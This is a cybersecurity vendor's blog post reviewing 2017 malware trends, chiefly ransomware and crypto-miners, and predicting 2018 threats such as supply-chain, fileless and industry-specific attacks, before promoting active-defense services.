Looking back at the past 12 months, LMNTRIX Labs has analyzed and remediated our clients’ environments from a host of different malware samples. While we saw everything from key-loggers to banking trojans and crypto-miners, one form of malware reigned supreme.
Yup, you guessed it… ransomware.
This year alone, we picked apart more than 30 ransomware samples, including the juggernaut WannaCry and NotPetya variants that made the world stop and take notice. With this in mind, it’s clear 2017 was the year ransomware reigned supreme.
Although it was hard to go a month without running into a new ransomware sample, we also saw a clear rise in the number of crypto-mining malware strains, and – as the value of digital currencies continues to sky-rocket – this is an attack-type that will only become more prevalent.
Taking these trends into account, what’s on the horizon for 2018?
• Supply chains will come under heavy fire from attackers targeting benign software and its underlying infrastructure. As the ‘big end of town’ continues to bolster its defences, hackers will continue to look further down the supply chain for other avenues into the enterprise.
• Crypto-mining malware will become a favourite attack-type, particularly given Bitcoin’s meteoric rise in value. As long as the surge continues, threat actors will leave no stone unturned to take advantage of this opportunity through malicious means.
• Ransomware isn’t going anywhere, particularly given its success this year. New variants will emerge, old ones will be tweaked, and the deep and dark webs will be flooded with ransomware-as-a-service offerings for would-be hackers. This year’s high-profile attacks will draw more people into the shady underbelly of the internet, and with malware-as-a-service offerings complete with full customer support already available, we expect these to become both more common place and more sophisticated next year.
• File-less and Powershell usage will come to the fore as attackers seek to maintain persistence within victim environments. These tactics will be complimented with DLL injection, code obfuscation, and vulnerability exploitation as ways to evade defences while proxy communication through windows registry key manipulation will gain popularity to perform command and control communications.
• Industry-specific malware will become much more common, particularly in the wake of this year’s “Industroyer” strain which was crafted specifically with Industrial Control Systems in mind. We’ll see the Financial industry in the crosshairs with trojans targeting point-of-sale terminals, connected healthcare devices will remain easy targets due to lack of appropriate security measures, and as we get closer to the realisation of self-driving cars Bluetooth and Wi-Fi-based attacks will make connected vehicles easy module hijacking targets.
With everything we’ve seen this year, it’s clear traditional security and signature-based perimeter defences will no longer be a viable solution to address advanced threats. Today’s malware is designed to slip past the walls enterprises erect around their environments, so only active defense with proactive hunting and continuous monitoring can discover and destroy the threats that yesterday’s defences miss. Deep and dark web monitoring ensures you can stay abreast of any customer data currently on the black market (or someone asking for advice on how to get past your defences), while decoys and a deceptive parallel environment can lie in wait to trap attackers the second they breach your systems.
The threat landscape is ever-changing, so if you rely too heavily on yesterday’s defences you’ll find yourself in tomorrow’s headlines.